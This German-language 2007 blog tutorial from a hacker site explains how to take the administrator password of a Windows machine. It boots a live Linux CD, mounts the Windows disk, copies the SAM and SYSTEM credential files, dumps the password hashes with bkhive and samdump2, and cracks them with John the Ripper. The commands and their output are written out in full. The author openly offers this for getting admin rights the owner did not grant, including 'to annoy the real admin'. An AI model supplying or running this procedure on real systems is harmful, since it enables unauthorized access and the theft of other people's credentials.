Home arrow Papers arrow Papers (German) arrow Windows Admin Passwort knacken (German)

main

Home
Blog
IRC

stuff

Projects
Papers


Netgarage RSS Feed
Linux Powered
Hacker Emblem
Apache 2.0 Power
Valid XHTML








Windows Admin Passwort knacken (German)
Written by ebrosius   
Friday, 18 May 2007

Kurzer Text, der zeigt wie einfach es geht mit Auditor linux das Admin Passwort zu bekommen.

 

Manchmal ist es sinnvoll Administrator bei einer Windows-Kiste zu werden. Weil entweder einige Dienste nicht zur Verfügung stehen, oder einfach nur um den richtigen Admin zu ärgern.

Los gehts: Zuerst benötigt man zwei Dateien von der Windows-Kiste: WINDOWS/system32/config/sam und WINDOWS/system32/config/system. Dann besorgt man sich die Auditor Linux bzw Backtrack live CD. Falls man nicht direkt am Rechner arbeiten kann (kann eine Weile dauern), einfach Auditor booten und die zwei Dateien auf einen USB-Stick ziehen. In diesem Fall arbeiten wir direkt am Windows Rechner und booten Auditor:

 

root@1[~]# mkdir /mnt/win

root@1[~]# mount -t ntfs /dev/hda1 /mnt/win

root@1[~]# bkhive-linux /mnt/win/WINDOWS/system32/config/system syskey.txt

Bkhive This e-mail address is being protected from spam bots, you need JavaScript enabled to view it

Bootkey: 501ak7296e35f4fb6d94kj31l4kh4a01

root@1[~]# samdump2-linux /mnt/win/WINDOWS/system32/config/sam syskey.txt > hashes.txt

Samdump2 This e-mail address is being protected from spam bots, you need JavaScript enabled to view it

This product includes cryptographic software written

by Eric Young ( This e-mail address is being protected from spam bots, you need JavaScript enabled to view it )

No password for user Guest(501)

No password for user studies(605)

No V value!

root@1[~]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz > english.txt

nroot@1[~]# john -w:english.txt hashes.txt

Loaded 2 password hashes with no different salts (NT LM DES [32/32 BS])\r\nPINKY (FSR)

nguesses: 1 time: 0:00:00:05 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ

 

Ok, ein Passwort haben wir schonmal, aber das ist noch nicht das Admin Passwort. Nach einigem durchprobieren der Wordlists scheint es wohl etwas komplizierter zu sein. Also nehmen wir "john -i:all hashes.txt" um alle möglichen Zahlen und Zeichen zu probieren.

 

root@1[~]# john -i:all hashes.txt

 

Das kann nun eine Weile dauern. Mit return kann man sehen welche Kombination gerade probiert wird. Nach 4 Stunden hatte ich keine Lust mehr zuzuschauen und bin ratzen gegangen. Am nächsten Morgen stand das Admin Passwort da.
Last Updated ( Friday, 18 May 2007 )
 
< Prev   Next >
[ Back ]